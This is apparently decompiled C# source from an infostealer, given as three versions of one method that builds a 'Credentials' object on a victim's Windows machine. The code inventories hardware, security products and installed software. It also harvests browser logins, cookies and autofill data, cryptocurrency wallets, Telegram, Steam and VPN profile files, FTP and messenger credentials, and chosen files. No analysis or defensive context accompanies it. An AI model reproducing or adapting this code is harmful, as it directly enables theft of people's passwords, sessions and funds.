// Token: 0x0600004F RID: 79 RVA: 0x000028BC File Offset: 0x00000ABC public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials { Defenders = new List <string>(), Browsers = new List <Browser>(), Files = new List <RemoteFile>(), FtpConnections = new List <LoginPair>(), Hardwares = new List <Hardware>(), InstalledBrowsers = new List <InstalledBrowserInfo>(), InstalledSoftwares = new List <string>(), Languages = new List <string>(), Processes = new List <string>(), ColdWallets = new List <ColdWallet>(), ImportantAutofills = new List <Autofill>(), SteamFiles = new List <RemoteFile>(), NordVPN = new List <LoginPair>(), OpenVPN = new List <RemoteFile>(), ProtonVPN = new List <RemoteFile>(), TelegramFiles = new List <RemoteFile>() }; try { try { ReadOnlyCollection <WmiProcessor> source = new WmiService().QueryAll <WmiProcessor>(new WmiProcessorQuery(), null); credentials.Hardwares = (from x in source select new Hardware { Caption = x.Name, HardType = HardwareType.Processor, Parameter = string.Format("{0}", x.NumberOfCores) }).ToList <Hardware>(); } catch { } try { WmiService wmiService = new WmiService(); if (credentials.Hardwares == null) { credentials.Hardwares = new List <Hardware>(); } foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery(), null) where x.AdapterRAM > 0U select new Hardware { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = string.Format("{0}", x.AdapterRAM) }).ToList <Hardware>()) { credentials.Hardwares.Add(item); } } catch { } try { credentials.Hardwares.Add(new Hardware { Caption = "Total of RAM", HardType = HardwareType.Graphic, Parameter = UserInfoHelper.TotalOfRAM() }); } catch { } try { WmiService wmiService2 = new WmiService(); List <WmiQueryBase> list = new List <WmiQueryBase> { new WmiAntivirusQuery(), new WmiAntiSpyWareQuery(), new WmiFirewallQuery() }; string[] array = new string[] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> list2 = new List <WmiAntivirus>(); foreach (WmiQueryBase wmiQuery in list) { foreach (string scope in array) { try { list2.AddRange(wmiService2.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>()); } catch { } } } credentials.Defenders = (from x in list2 select x.DisplayName).Distinct <string>().ToList <string>(); } catch { } credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers(); credentials.Processes = UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms(); credentials.Languages = UserInfoHelper.AvailableLanguages(); if (settings.GrabTelegram) { credentials.TelegramFiles.AddRange(TelegramGrabber.ParseFiles()); } if (settings.GrabVPN) { credentials.NordVPN.AddRange(NordVPN.GetProfile()); credentials.OpenVPN.AddRange(OpenVPN.ParseFiles()); credentials.ProtonVPN.AddRange(ProtonVPN.ParseFiles()); } if (settings.GrabSteam) { credentials.SteamFiles.AddRange(SteamGrabber.ParseFiles()); } if (settings.GrabBrowsers) { List <Browser> list3 = new List <Browser>(); if (settings.PortablePaths == null) { settings.PortablePaths = new List <string>(); } settings.PortablePaths.Add(Constants.RoamingAppData); settings.PortablePaths.Add(Constants.LocalAppData); List <string> list4 = new List <string>(); List <string> list5 = new List <string>(); foreach (string text in Constants.chromiumBrowserPaths) { string text2 = string.Empty; if (text.Contains("Opera")) { text2 = Constants.RoamingAppData + text; } else { text2 = Constants.LocalAppData + text; } if (Directory.Exists(text2)) { foreach (string text3 in DecryptHelper.FindPaths(text2, 1, 1, new string[] { "Login Data", "Web Data", "Cookies" })) { if ((text3.EndsWith("Login Data") || text3.EndsWith("Web Data") || text3.EndsWith("Cookies")) && !list4.Contains(text3)) { list4.Add(text3); } } } } foreach (string str in Constants.geckoBrowserPaths) { try { string text4 = Constants.RoamingAppData + str; if (Directory.Exists(text4)) { foreach (string text5 in DecryptHelper.FindPaths(text4, 2, 1, new string[] { "key3.db", "key4.db", "cookies.sqlite", "logins.json" })) { if ((text5.EndsWith("key3.db") || text5.EndsWith("key4.db") || text5.EndsWith("cookies.sqlite") || text5.EndsWith("logins.json")) && !list5.Contains(text5)) { list5.Add(text5); } } } } catch { } } list3.AddRange(ChromiumEngine.ParseBrowsers(list4)); list3.AddRange(GeckoEngine.ParseBrowsers(list5)); foreach (Browser browser in list3) { if (!browser.IsEmpty()) { using (List <Autofill> .Enumerator enumerator6 = CredentialsHelper.FindImportant(browser.Autofills).GetEnumerator()) { while (enumerator6.MoveNext()) { Autofill autofill = enumerator6.Current; if (!credentials.ImportantAutofills.Any((Autofill x) => x.Name == autofill.Name && x.Value == autofill.Value)) { credentials.ImportantAutofills.Add(autofill); } } } credentials.Browsers.Add(browser); } } } if (settings.GrabWallets) { List <ColdWallet> list6 = new List <ColdWallet>(); list6.AddRange(ColdWalletsGrabber.ParseFiles()); foreach (ColdWallet item2 in list6) { credentials.ColdWallets.Add(item2); } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths, null); } if (settings.GrabFTP) { List <LoginPair> list7 = new List <LoginPair>(); list7.AddRange(FileZilla.ParseConnections()); list7.AddRange(WinSCP.ParseConnections()); credentials.FtpConnections = list7; } if (settings.GrabImClients) { foreach (LoginPair item3 in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(item3); } } } catch (Exception) { } return(credentials); }
public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials() { Browsers = (IList <Browser>) new List <Browser>(), Files = (IList <RemoteFile>) new List <RemoteFile>(), FtpConnections = (IList <LoginPair>) new List <LoginPair>(), Hardwares = (IList <Hardware>) new List <Hardware>(), InstalledBrowsers = (IList <InstalledBrowserInfo>) new List <InstalledBrowserInfo>(), InstalledSoftwares = (IList <string>) new List <string>(), Languages = (IList <string>) new List <string>(), Processes = (IList <string>) new List <string>(), Defenders = (IList <string>) new List <string>() }; try { WmiService wmiService = new WmiService(); try { ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>((WmiQueryBase) new WmiProcessorQuery(), (ManagementObjectSearcher)null); credentials.Hardwares = (IList <Hardware>)source.Select <WmiProcessor, Hardware>((Func <WmiProcessor, Hardware>)(x => new Hardware() { Caption = x.Name, HardType = HardwareType.Processor, Parameter = string.Format("{0}", (object)x.NumberOfCores) })).ToList <Hardware>(); } catch { } try { if (credentials.Hardwares == null) { credentials.Hardwares = (IList <Hardware>) new List <Hardware>(); } foreach (Hardware hardware in wmiService.QueryAll <WmiGraphicCard>((WmiQueryBase) new WmiGraphicCardQuery(), (ManagementObjectSearcher)null).Where <WmiGraphicCard>((Func <WmiGraphicCard, bool>)(x => x.AdapterRAM > 0U)).Select <WmiGraphicCard, Hardware>((Func <WmiGraphicCard, Hardware>)(x => new Hardware() { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = string.Format("{0}", (object)x.AdapterRAM) })).ToList <Hardware>()) { credentials.Hardwares.Add(hardware); } } catch { } try { List <WmiQueryBase> wmiQueryBaseList = new List <WmiQueryBase>() { (WmiQueryBase) new WmiAntivirusQuery(), (WmiQueryBase) new WmiAntiSpyWareQuery(), (WmiQueryBase) new WmiFirewallQuery() }; string[] strArray = new string[2] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> source = new List <WmiAntivirus>(); foreach (WmiQueryBase wmiQuery in wmiQueryBaseList) { foreach (string scope in strArray) { try { source.AddRange((IEnumerable <WmiAntivirus>)wmiService.QueryAll <WmiAntivirus>(wmiQuery, new ManagementObjectSearcher(scope, string.Empty)).ToList <WmiAntivirus>()); } catch { } } } credentials.Defenders = (IList <string>)source.Select <WmiAntivirus, string>((Func <WmiAntivirus, string>)(x => x.DisplayName)).Distinct <string>().ToList <string>(); } catch { } credentials.InstalledBrowsers = (IList <InstalledBrowserInfo>)UserInfoHelper.GetBrowsers(); credentials.Processes = (IList <string>)UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = (IList <string>)UserInfoHelper.ListOfPrograms(); credentials.Languages = (IList <string>)UserInfoHelper.AvailableLanguages(); if (settings.GrabBrowsers) { List <Browser> browserList = new List <Browser>(); browserList.AddRange((IEnumerable <Browser>)ChromiumEngine.ParseBrowsers()); browserList.AddRange((IEnumerable <Browser>)GeckoEngine.ParseBrowsers()); browserList.Add(EdgeEngine.ParseBrowsers()); foreach (Browser browser in browserList) { if (!browser.IsEmpty()) { credentials.Browsers.Add(browser); } } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles((IEnumerable <string>)settings.GrabPaths); } if (settings.GrabFTP) { List <LoginPair> loginPairList = new List <LoginPair>(); loginPairList.AddRange((IEnumerable <LoginPair>)FileZilla.ParseConnections()); loginPairList.AddRange((IEnumerable <LoginPair>)WinSCP.ParseConnections()); credentials.FtpConnections = (IList <LoginPair>)loginPairList; } if (settings.GrabImClients) { foreach (LoginPair connection in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(connection); } } } catch { } return(credentials); }
public static Credentials Create(ClientSettings settings) { Credentials credentials = new Credentials { Browsers = new List <Browser>(), Files = new List <RemoteFile>(), FtpConnections = new List <LoginPair>(), Hardwares = new List <Hardware>(), InstalledBrowsers = new List <InstalledBrowserInfo>(), InstalledSoftwares = new List <string>(), Languages = new List <string>(), Processes = new List <string>(), Defenders = new List <string>() }; try { WmiService wmiService = new WmiService(); try { ReadOnlyCollection <WmiProcessor> source = wmiService.QueryAll <WmiProcessor>(new WmiProcessorQuery()); credentials.Hardwares = source.Select((WmiProcessor x) => new Hardware { Caption = x.Name, HardType = HardwareType.Processor, Parameter = $"{x.NumberOfCores}" }).ToList(); } catch { } try { if (credentials.Hardwares == null) { credentials.Hardwares = new List <Hardware>(); } foreach (Hardware item in (from x in wmiService.QueryAll <WmiGraphicCard>(new WmiGraphicCardQuery()) where x.AdapterRAM != 0 select new Hardware { Caption = x.Name, HardType = HardwareType.Graphic, Parameter = $"{x.AdapterRAM}" }).ToList()) { credentials.Hardwares.Add(item); } } catch { } try { List <WmiQueryBase> list = new List <WmiQueryBase> { new WmiAntivirusQuery(), new WmiAntiSpyWareQuery(), new WmiFirewallQuery() }; string[] array = new string[2] { "ROOT\\SecurityCenter2", "ROOT\\SecurityCenter" }; List <WmiAntivirus> list2 = new List <WmiAntivirus>(); foreach (WmiQueryBase item2 in list) { string[] array2 = array; foreach (string scope in array2) { try { list2.AddRange(wmiService.QueryAll <WmiAntivirus>(item2, new ManagementObjectSearcher(scope, string.Empty)).ToList()); } catch { } } } credentials.Defenders = list2.Select((WmiAntivirus x) => x.DisplayName).Distinct().ToList(); } catch { } credentials.InstalledBrowsers = UserInfoHelper.GetBrowsers(); credentials.Processes = UserInfoHelper.ListOfProcesses(); credentials.InstalledSoftwares = UserInfoHelper.ListOfPrograms(); credentials.Languages = UserInfoHelper.AvailableLanguages(); if (settings.GrabBrowsers) { List <Browser> list3 = new List <Browser>(); list3.AddRange(ChromiumEngine.ParseBrowsers()); list3.AddRange(GeckoEngine.ParseBrowsers()); list3.Add(EdgeEngine.ParseBrowsers()); foreach (Browser item3 in list3) { if (!item3.IsEmpty()) { credentials.Browsers.Add(item3); } } } if (settings.GrabFiles) { credentials.Files = RemoteFileGrabber.ParseFiles(settings.GrabPaths); } if (settings.GrabFTP) { List <LoginPair> list4 = new List <LoginPair>(); list4.AddRange(FileZilla.ParseConnections()); list4.AddRange(WinSCP.ParseConnections()); credentials.FtpConnections = list4; } if (settings.GrabImClients) { foreach (LoginPair item4 in Pidgin.ParseConnections()) { credentials.FtpConnections.Add(item4); } return(credentials); } return(credentials); } catch { return(credentials); } }